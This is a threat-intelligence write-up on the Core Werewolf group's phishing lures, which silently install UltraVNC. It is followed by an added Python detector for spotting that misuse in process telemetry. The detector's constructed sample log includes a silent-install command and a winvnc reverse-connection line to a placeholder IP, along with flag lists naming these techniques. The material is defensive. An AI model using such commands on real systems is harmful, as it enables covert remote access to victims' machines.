BI.ZONE uncovers espionage attacks on the defense industry and critical infrastructure
The threat actors target confidential information about Russia’s critically important facilities.
There is a growing trend among cybercriminals and APT groups toward using legitimate tools: because such software is expected on corporate networks, its activity blends in with normal administration and lets the attackers remain undetected for a long time.
Core Werewolf is one such APT group. Its activity can be traced back to August 2021 and has continued ever since. BI.ZONE Cyber Threat Intelligence examined the decoy documents the adversaries used to mislead their victims and established that the group primarily targets Russian organizations associated with the defense industry and critical infrastructure.
To penetrate the infrastructure, the attackers sent phishing emails containing links to malicious files. The files were disguised as .docx and .pdf documents (decrees, orders, guidelines, memos, and resumes), so their content raised no suspicion with the user. Opening the file, however, silently installed UltraVNC in the background. UltraVNC is legitimate remote-desktop software widely used for administration; here the attackers used it to obtain remote access to the compromised devices.
Mitigating the risk of such attacks requires both reactive and proactive threat detection. BI.ZONE experts recommend dedicated email protection solutions that block malicious messages. In addition, security event monitoring is essential for tracking suspicious behavior of legitimate programs, for example a remote-access tool that appears on a workstation right after a user opens a document.
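The following is an added example, not BI.ZONE code and not derived from the actual Core Werewolf samples. It shows the kind of check the monitoring recommendation above calls for: reading process-creation telemetry and flagging UltraVNC when it is planted through a document lure (spawned by a document reader, running from a user-writable directory, installed silently, or dialing out to an external host) rather than installed by an administrator. The field names follow a generic Sysmon-style event (Image, ParentImage, CommandLine, User); the log lines, user name and IP address are constructed; the silent-install flags assume UltraVNC's installer is Inno Setup based, and the reverse-connection switches are the documented winvnc.exe options.

```python
"""Illustrative detector for UltraVNC misuse in process-creation telemetry.

Added example, not BI.ZONE's own code. Event fields are Sysmon-style
(Image, ParentImage, CommandLine, User); all sample events are constructed.
"""
import json
from typing import Dict, List

# Binaries shipped with UltraVNC (winvnc.exe is the server component).
# A name match alone is weak, so it is only reported together with context.
VNC_IMAGE_NAMES = {"winvnc.exe", "vncviewer.exe"}
# Document viewers that have no business launching a remote-access server.
DOCUMENT_READERS = {"winword.exe", "acrord32.exe", "acrobat.exe",
                    "foxitreader.exe", "wordpad.exe"}
# Path fragments of user-writable locations; a legitimately installed
# UltraVNC runs from Program Files, not from here.
USER_WRITABLE_MARKERS = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\public\\")
# Assumption: the UltraVNC setup program is Inno Setup based, so these
# switches mean an unattended (silent) install.
SILENT_INSTALL_FLAGS = ("/verysilent", "/silent", "/sp-", "/suppressmsgboxes")
# winvnc.exe options for a reverse connection to a listening viewer.
REVERSE_CONNECT_FLAGS = ("-connect", "-autoreconnect")


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(ev: Dict[str, str]) -> List[str]:
    """Return the reasons this event looks like UltraVNC being planted.

    An empty list means the event is either not UltraVNC at all or is
    consistent with an ordinary administrative installation.
    """
    image = ev.get("Image", "")
    parent = ev.get("ParentImage", "")
    cmdline = ev.get("CommandLine", "").lower()
    is_vnc = (_basename(image) in VNC_IMAGE_NAMES
              or "ultravnc" in image.lower() or "ultravnc" in cmdline)
    if not is_vnc:
        return []
    reasons: List[str] = []
    if _basename(parent) in DOCUMENT_READERS:
        reasons.append(f"launched by document reader {_basename(parent)}")
    if any(m in image.lower() for m in USER_WRITABLE_MARKERS):
        reasons.append("runs from a user-writable directory")
    if any(f in cmdline for f in SILENT_INSTALL_FLAGS):
        reasons.append("silent installer flags")
    if any(f in cmdline for f in REVERSE_CONNECT_FLAGS):
        reasons.append("reverse connection to an external host")
    return reasons


def detect(log_lines: List[str]) -> List[Dict[str, object]]:
    """Parse JSON-lines telemetry and return one alert per suspicious event."""
    alerts: List[Dict[str, object]] = []
    for line in log_lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        reasons = score_event(ev)
        if reasons:
            alerts.append({"Image": ev.get("Image"), "User": ev.get("User"),
                           "reasons": reasons})
    return alerts


# Constructed sample telemetry (not real captures). Event 1 is a normal
# UltraVNC service start; events 2 and 3 mimic a document lure dropping and
# starting the tool; event 4 is unrelated noise. The IP is from the
# documentation range 203.0.113.0/24.
SAMPLE_LOG = r"""
{"Image": "C:\\Program Files\\uvnc bvba\\UltraVNC\\winvnc.exe", "ParentImage": "C:\\Windows\\System32\\services.exe", "CommandLine": "winvnc.exe -service", "User": "NT AUTHORITY\\SYSTEM"}
{"Image": "C:\\Users\\ivanov\\AppData\\Local\\Temp\\UltraVNC_Setup.exe", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "CommandLine": "UltraVNC_Setup.exe /VERYSILENT /SUPPRESSMSGBOXES", "User": "CORP\\ivanov"}
{"Image": "C:\\Users\\ivanov\\AppData\\Roaming\\winvnc.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "winvnc.exe -connect 203.0.113.10:5500 -autoreconnect", "User": "CORP\\ivanov"}
{"Image": "C:\\Windows\\System32\\notepad.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "notepad.exe memo.txt", "User": "CORP\\ivanov"}
"""

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(alert["Image"], "->", "; ".join(alert["reasons"]))
```

The point of the context checks is that UltraVNC itself is not an indicator: the first sample event, a service start from Program Files, produces no alert, while the installer spawned by WINWORD.EXE from a temp directory and the server dialing out from AppData each produce one. In production the same logic maps directly onto a SIEM rule keyed on process creation events; the hard-coded lists are the part to tune for your environment.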